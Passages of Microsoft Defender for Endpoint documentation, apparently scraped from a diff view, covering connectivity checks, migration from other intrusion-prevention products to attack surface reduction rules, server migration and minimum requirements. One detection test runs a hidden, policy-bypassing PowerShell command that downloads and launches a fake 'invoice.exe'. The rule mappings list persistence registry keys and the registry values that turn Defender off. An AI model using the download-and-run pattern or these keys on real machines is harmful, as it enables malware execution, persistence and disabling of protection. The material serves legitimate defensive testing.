-For Auto-IR testing labs, navigate to **Microsoft Defender XDR** \> **Evaluations & Tutorials** \> **Tutorials & Simulations** \> **Tutorials \> **Automated Investigation tutorials**.
-
-#### Cloud-delivered protection
-
-1. Open a Command Prompt as an administrator.
-
-2. Right-click the item in the Start menu, select **Run as administrator** then select **Yes** at the permissions prompt.
-
-3. Use the following argument with the Microsoft Defender Antivirus command-line utility (mpcmdrun.exe) to verify that your network can communicate with the Microsoft Defender Antivirus cloud service:
-
- ```dos
- "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -ValidateMapsConnection
- ```
-
- > [!NOTE]
- > This command will only work on Windows 10, version 1703 or higher, or Windows 11.
- > For more information, see [Manage Microsoft Defender Antivirus with the mpcmdrun.exe commandline tool](command-line-arguments-microsoft-defender-antivirus.md).
-
-#### Test Block at First Sight
-
-Follow instructions in [Microsoft Defender for Endpoint Block at First Sight (BAFS) demonstration](defender-endpoint-demonstration-block-at-first-sight-bafs.md).
-
-#### Test SmartScreen
-
-Follow instructions in [Microsoft Defender SmartScreen Demo (msft.net)](https://demo.smartscreen.msft.net/).
-
-### PowerShell detection test
-
-1. On the Windows device, create a folder: `C:\test-MDATP-test`.
-
-2. Open Command Prompt as an administrator.
-
-3. In the Command Prompt window, run the following PowerShell command:
-
- ```powershell
- powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe'
- ```
-
-After the command runs, the Command Prompt window closes automatically. If successful, the detection test is marked as completed.
-
-For macOS and Linux, you can use the following methods:
--- MDATP connectivity tests-- Tracking with advanced hunting in Microsoft Defender XDR-- Run tests to confirm connectivity with Defender for Endpoint services-
-### MDATP connectivity test (macOS and Linux)
-
-Run `mdatp health -details features` to confirm simplified_connectivity: "enabled".
-
-Run `mdatp health -details edr` to confirm `edr_partner_geo_location` is available. The value should be `GW_<geo>` where 'geo' is your tenant's geo-location.
-
-Run mdatp connectivity test. Ensure the streamlined URL pattern is present. You should expect two for '\storage', one for '\mdav', one for '\xplat', and one for '/packages'.
-
-For example: `https:mdav.us.endpoint.security.microsoft/com/storage`
-
-<a name='tracking-with-advanced-hunting-in-microsoft-365-defender'></a>
-
-### Tracking with advanced hunting in Microsoft Defender XDR
-
-Follow the same instructions as for Windows.
-
-### Use Defender for Endpoint Client Analyzer (cross-platform) to validate connectivity for newly migrated endpoints
-
-Download and run the client analyzer for macOS or Linux. For more information, see [Download and run the client analyzer](download-client-analyzer.md).
-
-1. Run `mdeclientanalyzer.cmd -o <path to cmd file>` from within the MDEClientAnalyzer folder. The command uses parameters from the onboarding package to test connectivity.
-
-2. Run `mdeclientanalyzer.cmd -g <GW_US, GW_UK, GW_EU>` (where parameter is of GW_US, GW_EU, GW_UK). GW refers to the streamlined option. Run with applicable tenant geo.
security Migrating Asr Rules https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/migrating-asr-rules.md
- Title: Migrating from non-Microsoft HIPS to attack surface reduction rules
-description: Describes how to approach a migration from a non-Microsoft Host Intrusion Prevention System (HIPS) solution into attack surface reduction rules.
---------- m365-security-- tier2-- mde-asr Previously updated : 03/26/2021--
-# Migrating from a non-Microsoft HIPS to attack surface reduction rules
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-This article helps you to map common rules to Microsoft Defender for Endpoint.
-
-## Scenarios when migrating from a non-Microsoft HIPS product to attack surface reduction rules
-
-### Block creation of specific files
--- **Applies to**- All processes-- **Operation**- File Creation-- **Examples of Files/Folders, Registry Keys/Values, Processes, Services**- *.zepto, *.odin, *.locky, *.jaff, *.lukitus, *.wnry, *.krab-- **Attack Surface Reduction rules**- attack surface reduction rules block the attack techniques and not the Indicators of Compromise (IOC). Blocking a specific file extension isn't always useful, as it doesn't prevent a device from compromise. It only partially thwarts an attack until attackers create a new type of extension for the payload.-- **Other recommended features**- Having Microsoft Defender Antivirus enabled, along with Cloud Protection and Behavior Analysis is highly recommended. We recommend that you use other prevention, such as the attack surface reduction rule *Use advanced protection against ransomware*, which provides a greater level of protection against ransomware attacks. Furthermore, Microsoft Defender for Endpoint monitors many of these registry keys, such as ASEP techniques, which trigger specific alerts. The registry keys used require a minimum of Local Admin or Trusted Installer privileges can be modified. It's recommended to use a locked down environment with minimum administrative accounts or rights. Other system configurations can be enabled, including *Disable SeDebug for nonrequired roles* that's part of our wider security recommendations.-
-### Block creation of specific registry keys
--- **Applies to**- All Processes-- **Processes**- N/A-- **Operation**- Registry Modifications-- **Examples of Files/Folders, Registry Keys/Values, Processes, Services**- *\Software*,HKCU\Environment\UserInitMprLogonScript,HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs*\StartExe, HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options*\Debugger, HKEY_CURRENT_USER\Software\Microsoft\HtmlHelp Author\location, HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit*\MonitorProcess-- **Attack Surface Reduction rules**- attack surface reduction rules block the attack techniques and not the Indicators of Compromise (IOC). Blocking a specific file extension isn't always useful, because it doesn't prevent a device from compromise. It only partially thwarts an attack until attackers create a new type of extension for the payload.-- **Other recommended features**- Having Microsoft Defender Antivirus enabled, along with Cloud Protection and Behavior Analysis is highly recommended. We recommend you use extra prevention, such as the attack surface reduction rule *Use advanced protection against ransomware*. This provides a greater level of protection against ransomware attacks. Furthermore, Microsoft Defender for Endpoint monitors several of these registry keys, such as ASEP techniques, which trigger specific alerts. Additionally, the registry keys used require a minimum of Local Admin or Trusted Installer privileges can be modified. It's recommended to use a locked down environment with minimum administrative accounts or rights. Other system configurations can be enabled, including *Disable SeDebug for nonrequired roles* that's part of our wider security recommendations.-
-### Block untrusted programs from running from removable drives
--- **Applies to**- Untrusted Programs from USB-- **Processes**- *-- **Operation**- Process Execution-- **Examples of Files/Folders, Registry Keys/Values, Processes, -- **Attack Surface Reduction rules**- attack surface reduction rules have a built-in rule to prevent the launch of untrusted and unsigned programs from removable drives: *Block untrusted and unsigned processes that run from USB*, GUID *b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4*.-- **Other recommended features**- Please explore more controls for USB devices and other removable media using Microsoft Defender for Endpoint:[How to control USB devices and other removable media using Microsoft Defender for Endpoint](/windows/security/threat-protection/device-control/control-usb-devices-using-intune).-
-### Block Mshta from launching certain child processes
--- **Applies to**- Mshta-- **Processes**- mshta.exe-- **Operation**- Process Execution-- **Examples of Files/Folders, Registry Keys/Values, Processes, Services**- powershell.exe, cmd.exe, regsvr32.exe-- **Attack Surface Reduction rules**- attack surface reduction rules don't contain any specific rule to prevent child processes from *mshta.exe*. This control is within the remit of Exploit Protection or Windows Defender Application Control.-- **Other recommended features**- Enable Windows Defender Application Control to prevent mshta.exe from being executed altogether. If your organization requires *mshta.exe* for line of business apps, configure a specific Windows Defender Exploit Protection rule, to prevent mshta.exe from launching child processes.-
-### Block Outlook from launching child processes
--- **Applies to**- Outlook-- **Processes**- outlook.exe-- **Operation**- Process Execution-- **Examples of Files/Folders, Registry Keys/Values, Processes, Services**- powershell.exe-- **Attack Surface Reduction rules**- attack surface reduction rules have a built-in rule to prevent Office communication apps (Outlook, Skype, and Teams) from launching child processes: *Block Office communication application from creating child processes*, GUID *26190899-1602-49e8-8b27-eb1d0a1ce869*.-- **Other recommended features**- We recommend enabling PowerShell constrained language mode to minimize the attack surface from PowerShell.-
-### Block Office Apps from launching child processes
--- **Applies to**- Office-- **Processes**- winword.exe, powerpnt.exe, excel.exe-- **Operation**- Process Execution-- **Examples of Files/Folders, Registry Keys/Values, Processes, Services**- powershell.exe, cmd.exe, wscript.exe, mshta.exe, EQNEDT32.EXE, regsrv32.exe-- **Attack Surface Reduction rules**- attack surface reduction rules have a built-in rule to prevent Office apps from launching child processes: *Block all Office applications from creating child processes*, GUID *d4f940ab-401b-4efc-aadc-ad5f3c50688a*.-- **Other recommended features**- N/A-
-### Block Office Apps from creating executable content
--- **Applies to**- Office-- **Processes**- winword.exe, powerpnt.exe, excel.exe-- **Operation**- File Creation-- **Examples of Files/Folders, Registry Keys/Values, Processes, Services**- C:\Users*\AppData**.exe, C:\ProgramData**.exe, C:\ProgramData**.com, C:\Users*AppData\Local\Temp**.com, C:\Users*\Downloads**.exe, C:\Users*\AppData**.scf, C:\ProgramData**.scf, C:\Users\Public*.exe, C:\Users*\Desktop***.exe-- **Attack Surface Reduction rules**- N/A.-
-### Block Wscript from reading certain types of files
--- **Applies to**- Wscript-- **Processes**- wscript.exe-- **Operation**- File Read-- **Examples of Files/Folders, Registry Keys/Values, Processes, Services**- C:\Users*\AppData**.js, C:\Users*\Downloads**.js-- **Attack Surface Reduction rules**- Due to reliability and performance issues, attack surface reduction rules don't have the capability to prevent a specific process from reading a certain script file type. We do have a rule to prevent attack vectors that might originate from these scenarios. The rule name is *Block JavaScript or VBScript from launching downloaded executable content* (GUID *d3e037e1-3eb8-44c8-a917-57927947596d*) and the *Block execution of potentially obfuscated scripts* (GUID * 5beb7efe-fd9a-4556-801d-275e5ffc04cc*).-- **Other recommended features**- Though there are specific attack surface reduction rules that mitigate certain attack vectors within these scenarios, it's important to mention that AV is able by default to inspect scripts (PowerShell, Windows Script Host, JavaScript, VBScript, and more) in real time, through the Antimalware Scan Interface (AMSI). More info is available here: [Antimalware Scan Interface (AMSI)](/windows/win32/amsi/antimalware-scan-interface-portal).-
-### Block launch of child processes
--- **Applies to**- Adobe Acrobat-- **Processes**- AcroRd32.exe, Acrobat.exe-- **Operation**- Process Execution-- **Examples of Files/Folders, Registry Keys/Values, Processes, Services**- cmd.exe, powershell.exe, wscript.exe-- **Attack Surface Reduction rules**- attack surface reduction rules allow blocking Adobe Reader from launching child processes. The rule name is *Block Adobe Reader from creating child processes*, GUID *7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c*.-- **Other recommended features**- N/A-
-### Block download or creation of executable content
--- **Applies to**- CertUtil: Block download or creation of executable-- **Processes**- certutil.exe-- **Operation**- File Creation-- **Examples of Files/Folders, Registry Keys/Values, Processes, Services**- *.exe-- **Attack Surface Reduction rules**- attack surface reduction rules don't support these scenarios because they're a part of Microsoft Defender Antivirus protection.-- **Other recommended features**- Microsoft Defender Antivirus prevents CertUtil from creating or downloading executable content.-
-### Block processes from stopping critical System components
--- **Applies to**- All Processes-- **Processes**- *-- **Operation**- Process Termination-- **Examples of Files/Folders, Registry Keys/Values, Processes, Services**- MsSense.exe, MsMpEng.exe, NisSrv.exe, svchost.exe*, services.exe, csrss.exe, smss.exe, wininit.exe, and more.-- **Attack Surface Reduction rules**- attack surface reduction rules don't support these scenarios because they're protected with Windows built-in security protections.-- **Other recommended features**- ELAM (Early Launch AntiMalware), PPL (Protection Process Light), PPL AntiMalware Light, and System Guard.-
-### Block specific launch Process Attempt
--- **Applies to**- Specific Processes-- **Processes**- *Name your Process*-- **Operation**- Process Execution-- **Examples of Files/Folders, Registry Keys/Values, Processes, Services**- tor.exe, bittorrent.exe, cmd.exe, powershell.exe, and more-- **Attack Surface Reduction rules**- Overall, attack surface reduction rules aren't designed to function as an Application manager.-- **Other recommended features**- To prevent users from launching specific processes or programs, it's recommended to use Windows Defender Application Control. Microsoft Defender for Endpoint File and Cert indicators, can be used in an Incident Response scenario (shouldn't be seen as an application control mechanism).-
-### Block unauthorized changes to Microsoft Defender Antivirus configurations
--- **Applies to**- All Processes-- **Processes**- *-- **Operation**- Registry Modifications-- **Examples of Files/Folders, Registry Keys/Values, Processes, Services**- HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware, HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager\AllowRealTimeMonitoring, and so on.-- **Attack Surface Reduction rules**- attack surface reduction rules don't cover these scenarios because they're part of the Microsoft Defender for Endpoint built-in protection.-- **Other recommended features**- Tamper Protection (opt-in, managed from Intune) prevents unauthorized changes to DisableAntiVirus, DisableAntiSpyware, DisableRealtimeMonitoring, DisableOnAccessProtection, DisableBehaviorMonitoring, and DisableIOAVProtection registry keys (and more).-
-See also
--- [Attack surface reduction FAQ](attack-surface-reduction-faq.yml)-- [Enable attack surface reduction rules](enable-attack-surface-reduction.md)-- [Evaluate attack surface reduction rules](evaluate-attack-surface-reduction.md)
security Migrating Mde Server To Cloud https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/migrating-mde-server-to-cloud.md
- Title: Migrating servers from Microsoft Defender for Endpoint to Microsoft Defender for Cloud
-description: Learn how to migrate servers from Microsoft Defender for Endpoint to Microsoft Defender for Cloud.
-------- m365-security-- tier2- Previously updated : 07/19/2022--
-# Migrating servers from Microsoft Defender for Endpoint to Microsoft Defender for Cloud
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-This article guides you in migrating servers from Microsoft Defender for Endpoint to Defender for Cloud.
-
-[Microsoft Defender for Endpoint](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-endpoint) is an enterprise endpoint security platform designed to help enterprise networks prevent, detect, investigate, and respond to advanced threats.
-
-[Microsoft Defender for Cloud](https://azure.microsoft.com/services/defender-for-cloud/) is a solution for cloud security posture management (CSPM) and cloud workload protection (CWP) that finds weak spots across your cloud configuration. It also helps strengthen the overall security posture of your environment, and can protect workloads across multicloud and hybrid environments from evolving threats.
-
-While both products offer server protection capabilities, Microsoft Defender for Cloud is our primary solution to protect infrastructure resources, including servers.
-
-## How do I migrate my servers from Microsoft Defender for Endpoint to Microsoft Defender for Cloud?
-
-If you have servers onboarded to Defender for Endpoint, the migration process varies depending on machine type, but there's a set of shared prerequisites.
-
-Microsoft Defender for Cloud is a subscription-based service in the Microsoft Azure portal. Therefore, Defender for Cloud and the underlying plans like Microsoft Defender for Servers Plan 2 need to be enabled on Azure subscriptions.
-
-To enable Defender for Servers for Azure VMs and non-Azure machines connected through [Azure Arc-enabled servers](/azure/azure-arc/servers/overview), follow this guideline:
-
-1. If you aren't already using Azure, plan your environment following the [Azure Well-Architected Framework](/azure/architecture/framework/).
-
-2. Enable [Microsoft Defender for Cloud](/azure/defender-for-cloud/get-started) on your subscription.
-
-3. Enable a Microsoft Defender for Server plan on your [subscription(s)](/azure/defender-for-cloud/enable-enhanced-security). In case you're using Defender for Servers Plan 2, make sure to also enable it on the Log Analytics workspace your machines are connected to; it enables you to use optional features like File Integrity Monitoring, Adaptive Application Controls, and more.
-
-4. Make sure the [MDE integration](/azure/defender-for-cloud/integration-defender-for-endpoint?tabs=windows) is enabled on your subscription. If you have pre-existing Azure subscriptions, you might see one (or both) of the two opt-in buttons shown in the image below.
-
- :::image type="content" source="medie-integration.png":::
-
- If you have any of these buttons in your environment, make sure to enable integration for both. On new subscriptions, both options are enabled by default. In this case, you don't see these buttons in your environment.
-
-5. Make sure the connectivity requirements for Azure Arc are met. Microsoft Defender for Cloud requires all on-premises and non-Azure machines to be connected via the Azure Arc agent. In addition, Azure Arc doesn't support all MDE supported operating systems. So, learn how to plan for [Azure Arc deployments here](/azure/azure-arc/servers/plan-at-scale-deployment).
-
-6. *Recommended:* If you want to see vulnerability findings in Defender for Cloud, make sure to enable [Microsoft Defender Vulnerability Management](/azure/defender-for-cloud/enable-data-collection?tabs=autoprovision-va) for Defender for Cloud.
-
- :::image type="content" source="media/enable-threat-and-vulnerability-management.png" alt-text="Screenshot that shows how to enable vulnerability management." lightbox="media/enable-threat-and-vulnerability-management.png":::
-
-## How do I migrate existing Azure VMs to Microsoft Defender for Cloud?
-
-For Azure VMs, no extra steps are required, these are automatically onboarded to Microsoft Defender for Cloud, thanks to the native integration between the Azure platform and Defender for Cloud.
-
-## How do I migrate on-premises machines to Microsoft Defender for Servers?
-
-Once all prerequisites are met, [connect](/azure/defender-for-cloud/quickstart-onboard-machines?pivots=azure-arc) your on-premises machines via Azure Arc-connected servers.
-
-## How do I migrate VMs from AWS or GCP environments?
-
-1. Create a new multicloud connector on your subscription. (For more information on connector, see [AWS accounts](/azure/defender-for-cloud/quickstart-onboard-aws?pivots=env-settings) or [GCP projects](/azure/defender-for-cloud/quickstart-onboard-gcp?pivots=env-settings).
-
-2. On your multicloud connector, enable Defender for Servers on [AWS](/azure/defender-for-cloud/quickstart-onboard-aws?pivots=env-settings#prerequisites) or [GCP](/azure/defender-for-cloud/quickstart-onboard-gcp?pivots=env-settings#configure-the-servers-plan) connectors.
-
-3. Enable autoprovisioning on the multicloud connector for the Azure Arc agent, Microsoft Defender for Endpoint extension, Vulnerability Assessment and, optionally, Log Analytics extension.
-
- :::image type="content" source="media/select-plans-aws-gcp.png" alt-text="Screenshot that shows how to enable autoprovisioning for Azure Arc agent." lightbox="media/select-plans-aws-gcp.png":::
-
- For more information, see [Defender for Cloud's multicloud capabilities](https://aka.ms/mdcmc).
-
-## What happens once all migration steps are completed?
-
-After you complete the relevant migration steps, Microsoft Defender for Cloud deploys the `MDE.Windows` or `MDE.Linux` extension to your Azure VMs and non-Azure machines connected through Azure Arc (including VMs in AWS and GCP compute).
-
-The extension acts as a management and deployment interface, which orchestrates and wraps the MDE installation scripts inside the operating system and reflect its provisioning state to the Azure management plane. The installation process recognizes an existing Defender for Endpoint installation and connects it to Defender for Cloud by automatically adding Defender for Endpoint service tags.
-
-In case you have devices running Windows Server 2012 R2 or Windows Server 2016, and those devices are provisioned with the legacy, Log Analytics-based Microsoft Defender for Endpoint solution, Microsoft Defender for Cloud's deployment process deploys the Defender for Endpoint [unified solution](configure-server-endpoints.md#new-windows-server-2012-r2-and-2016-functionality-in-the-modern-unified-solution). After successful deployment, it will stop and disable the legacy Defender for Endpoint process on these machines.
security Migration Guides https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/migration-guides.md
- Title: Migration and setup guides to move to Microsoft Defender for Endpoint
-description: Learn how to make the switch from a non-Microsoft Defender XDR solution to Microsoft Defender for Endpoint
-------- m365-security-- tier1-- Previously updated : 01/27/2023---
-# Move to Microsoft Defender for Endpoint
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-## Migration and setup guides
-
-If you're considering moving to Defender for Endpoint, we have guidance to help. In the following table, review the scenarios. Select the scenario that best represents your situation, and see the recommended guidance.
-
-|Scenario|Guidance|
-|||
-|You don't have an endpoint protection solution in place yet, and you want to know more about Defender for Endpoint. You want to see how Defender for Endpoint works before rolling it out in your environment.|[Microsoft Defender for Endpoint evaluation lab](evaluation-lab.md)|
-|You already have Defender for Endpoint, and you want some help getting everything set up and configured.|[Microsoft Defender for Endpoint deployment guide](deployment-phases.md)|
-|You're planning to switch from a non-Microsoft endpoint protection solution to Defender for Endpoint, which includes Microsoft Defender Antivirus. You want to get an overview of the migration process and how to make the switch.|[Make the switch to Microsoft Defender for Endpoint](switch-to-mde-overview.md)|
-|You've already migrated or onboarded to Defender for Endpoint. You want some help with next steps, such as managing your security settings, configuring more features, or fine-tuning your security policies.| [Configure general Defender for Endpoint settings](preferences-setup.md) |
-| You were previously using Microsoft Defender for Endpoint Server, and now you're moving your servers to Microsoft Defender for Cloud. | [Migrating servers from Microsoft Defender for Endpoint to Microsoft Defender for Cloud](migrating-mde-server-to-cloud.md) |
--
-## Do you have feedback for us?
-
-Let us know what you think! Submit your feedback at the bottom of the page. We'll take your feedback into account as we continue to improve and add to our migration guidance.
-
-## See also
--- [Microsoft Defender XDR](/microsoft-365/security/defender/microsoft-365-defender)-- [Microsoft Defender for Endpoint](/windows/security/threat-protection)-- [Microsoft Defender for Office 365](/microsoft-365/security/office-365-security/defender-for-office-365)-- [Microsoft 365 Business Premium](../../business-premium/m365bp-overview.md)-- [Microsoft Defender for Business](../defender-business/mdb-overview.md)-
security Minimum Requirements https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/minimum-requirements.md
- Title: Minimum requirements for Microsoft Defender for Endpoint
-description: Understand the licensing requirements and requirements for onboarding devices to the service
---- Previously updated : 11/15/2023---- m365-security-- tier1----
-# Minimum requirements for Microsoft Defender for Endpoint
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-minreqs-abovefoldlink)
-
-There are some minimum requirements for onboarding devices to the Defender for Endpoint service. Learn about the licensing, hardware and software requirements, and other configuration settings to onboard devices to the service.
-
-> [!TIP]
->
-> - Learn about the latest enhancements in Defender for Endpoint: [Defender for Endpoint Tech Community](https://techcommunity.microsoft.com/t5/Windows-Defender-Advanced-Threat/ct-p/WindowsDefenderAdvanced).
-> - Defender for Endpoint demonstrated industry-leading optics and detection capabilities in the recent MITRE evaluation. Read: [Insights from the MITRE ATT&CK-based evaluation](https://cloudblogs.microsoft.com/microsoftsecure/2018/12/03/insights-from-the-mitre-attack-based-evaluation-of-windows-defender-atp/).
-> - If you're looking for endpoint protection for small and medium-sized businesses, see [Microsoft Defender for Business](../defender-business/mdb-overview.md) and [Defender for Business requirements](../defender-business/mdb-requirements.md).
-
-## Licensing requirements
--- [Defender for Endpoint Plan 1 and Plan 2](microsoft-defender-endpoint.md) (standalone or as part of other Microsoft 365 plans)--- [Microsoft Defender for Business](../defender-business/mdb-overview.md) (for small and medium-sized businesses)--- To [onboard servers](onboard-windows-server.md) to the standalone versions of Defender for Endpoint, server licenses are required. You can choose from: -
- - Microsoft Defender for Servers Plan 1 or Plan 2 (as part of the [Defender for Cloud](/azure/defender-for-cloud/defender-for-cloud-introduction)) offering
- - Microsoft Defender for Endpoint for Servers
- - [Microsoft Defender for Business servers](../defender-business/get-defender-business.md) (for small and medium-sized businesses only)
-
-For more detailed information about licensing requirements for Microsoft Defender for Endpoint, see [Microsoft Defender for Endpoint licensing information](/office365/servicedescriptions/microsoft-365-service-descriptions/microsoft-365-tenantlevel-services-licensing-guidance/microsoft-365-security-compliance-licensing-guidance#microsoft-defender-for-endpoint).
-
-For detailed licensing information, see the [Product Terms site](https://www.microsoft.com/licensing/terms/) and work with your account team to learn more about the terms and conditions.
-
-## Browser requirements
-
-Access to Defender for Endpoint is done through a browser. The following browsers are supported:
--- Microsoft Edge-- Google Chrome-
-> [!NOTE]
-> Although other browsers might work, the mentioned browsers are the ones supported.
-
-## Hardware and software requirements
-
-Devices on your network must be running one of these editions. New features or capabilities are typically provided only on operating systems that haven't yet reached the end of their support lifecycle. For more information, see [Supported Microsoft Defender for Endpoint capabilities by platform](/microsoft-365/security/defender-endpoint/supported-capabilities-by-platform). Microsoft recommends the installation of the latest available security patches for any operating system.
-
-### Supported Windows versions
--- Windows 11 Enterprise-- Windows 11 IoT Enterprise--- Windows 11 Education-- Windows 11 Pro-- Windows 11 Pro Education-- Windows 10 Enterprise-- [Windows 10 Enterprise LTSC 2016 (or later)](/windows/whats-new/ltsc/)-- Windows 10 IoT Enterprise (including LTSC)-- Windows 10 Education-- Windows 10 Pro-- Windows 10 Pro Education-- Windows server
- - Windows Server 2012 R2
- - Windows Server 2016
- - Windows Server, version 1803 or later
- - Windows Server 2019 and later
- - Windows Server 2019 core edition
- - Windows Server 2022
- - Windows Server 2022 core edition
-- Azure Virtual Desktop-- Windows 365 running one of the above operating systems/versions-
-The following operating systems require the use of the [Log Analytics](/azure/azure-monitor/agents/log-analytics-agent) / [Microsoft Monitoring Agent](update-agent-mma-windows.md) (MMA) to work with Defender for Endpoint:
--- Windows 8.1 Enterprise-- Windows 8.1 Pro-- Windows 7 SP1 Enterprise-- Windows 7 SP1 Pro-- Windows Server 2008 R2 SP1-
-To add antimalware protection to these older operating systems, you can use [System Center Endpoint Protection](onboard-downlevel.md#configure-and-update-system-center-endpoint-protection-clients).
-
-### Other supported operating systems
--- [macOS](microsoft-defender-endpoint-mac.md)-- [Linux](microsoft-defender-endpoint-linux.md)-- [Windows Subsystem for Linux](mde-plugin-wsl.md)-- [Android](microsoft-defender-endpoint-android.md)-- [iOS](microsoft-defender-endpoint-ios.md)-
-> [!NOTE]
-> - You'll need to confirm the Linux distributions and versions of Android, iOS, and macOS are compatible with Defender for Endpoint.
-> - While Windows 10 IoT Enterprise is a supported OS in Microsoft Defender for Endpoint and enables OEMs/ODMs to distribute it as part of their product or solution, customers should follow the OEM/ODM's guidance around host-based installed software and supportability.
-> - Endpoints running mobile versions of Windows (such as Windows CE and Windows 10 Mobile) aren't supported.
-> - Virtual Machines running Windows 10 Enterprise 2016 LTSB can encounter performance issues when used on non-Microsoft virtualization platforms.
-> - For virtual environments, we recommend using Windows 10 Enterprise LTSC 2019 or later.
-> - The standalone versions of [Defender for Endpoint Plan 1 and Plan 2](microsoft-defender-endpoint.md) do not include server licenses. To onboard servers to those plans, you'll need an additional license, such as Microsoft Defender for Servers Plan 1 or Plan 2 (as part of the [Defender for Cloud](/azure/defender-for-cloud/defender-for-cloud-introduction) offering). To learn more. see [Defender for Endpoint onboarding Windows Server](onboard-windows-server.md).
-> - If your organization is a small or medium-sized business, see [Microsoft Defender for Business requirements](../defender-business/mdb-requirements.md).
-
-### Hardware requirements
-
-The minimum hardware requirements for Defender for Endpoint on Windows devices are the same as the requirements for the operating system itself (that is, they aren't in addition to the requirements for the operating system).
--- Cores: 2 minimum, 4 preferred-- Memory: 1 GB minimum, 4 preferred-
-### Network and data storage and configuration requirements
-
-When you run the onboarding wizard for the first time, you must choose where your Microsoft Defender for Endpoint-related information is stored: in the European Union, the United Kingdom, or the United States datacenter.
-
-> [!NOTE]
->
-> - You cannot change your data storage location after the first-time setup.
-> - Review the [Microsoft Defender for Endpoint data storage and privacy](data-storage-privacy.md) for more information on where and how Microsoft stores your data.
-
-#### IP stack
-
-IPv4 (Internet Protocol Version 4) stack must be enabled on devices for communication to the Defender for Endpoint cloud service to work as expected.
-
-Alternatively, if you must use an IPv6-only configuration, consider adding dynamic IPv6/IPv4 transitional mechanisms, such as DNS64/NAT64 to ensure end-to-end IPv6 connectivity to Microsoft 365 without any other network reconfiguration.
-
-#### Internet connectivity
-
-Internet connectivity on devices is required either directly or through proxy.
-
-For more information on other proxy configuration settings, see [Configure device proxy and Internet connectivity settings](configure-proxy-internet.md).
-
-## Microsoft Defender Antivirus configuration requirement
-
-The Defender for Endpoint agent depends on Microsoft Defender Antivirus to scan files and provide information about them.
-
-Configure Security intelligence updates on the Defender for Endpoint devices whether Microsoft Defender Antivirus is the active antimalware solution or not. For more information, see [Manage Microsoft Defender Antivirus updates and apply baselines](/windows/security/threat-protection/microsoft-defender-antivirus/manage-updates-baselines-microsoft-defender-antivirus).
-
-When Microsoft Defender Antivirus isn't the active antimalware in your organization and you use the Defender for Endpoint service, Microsoft Defender Antivirus goes into passive mode.
-
-If your organization has turned off Microsoft Defender Antivirus through Group Policy or other methods, devices that are onboarded must be excluded from the Group Policy.
-
-If you're onboarding servers and Microsoft Defender Antivirus isn't the active antimalware on your servers, configure Microsoft Defender Antivirus to run in passive mode or uninstall it. The configuration is dependent on the server version. For more information, see [Microsoft Defender Antivirus compatibility](microsoft-defender-antivirus-compatibility.md).
-
-> [!NOTE]
-> Your regular Group Policy doesn't apply to Tamper Protection, and changes to Microsoft Defender Antivirus settings will be ignored when Tamper Protection is on. See [What happens when tamper protection is turned on](prevent-changes-to-security-settings-with-tamper-protection.md#what-happens-when-tamper-protection-is-turned-on)?
-
-## Microsoft Defender Antivirus Early Launch Antimalware (ELAM) driver is enabled
-
-If you're running Microsoft Defender Antivirus as the primary antimalware product on your devices, the Defender for Endpoint agent will successfully onboard.
-
-If you're running a third-party antimalware client and use Mobile Device Management solutions or Microsoft Configuration Manager (current branch), you need to ensure the Microsoft Defender Antivirus ELAM driver is enabled. For more information, see [Ensure that Microsoft Defender Antivirus isn't disabled by policy](troubleshoot-onboarding.md#ensure-that-microsoft-defender-antivirus-is-not-disabled-by-a-policy).
-
-## Related articles
--- [Set up Microsoft Defender for Endpoint deployment](production-deployment.md)-- [Onboard devices](onboard-configure.md)-
security Mobile Resources Defender Endpoint https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mobile-resources-defender-endpoint.md
- Title: Resources for Microsoft Defender for Endpoint for mobile devices
-description: Learn about the configurations and privacy settings for all the features in Defender for Endpoint on mobile devices.
-------- m365-security-- tier3-- Previously updated : 02/09/2024-
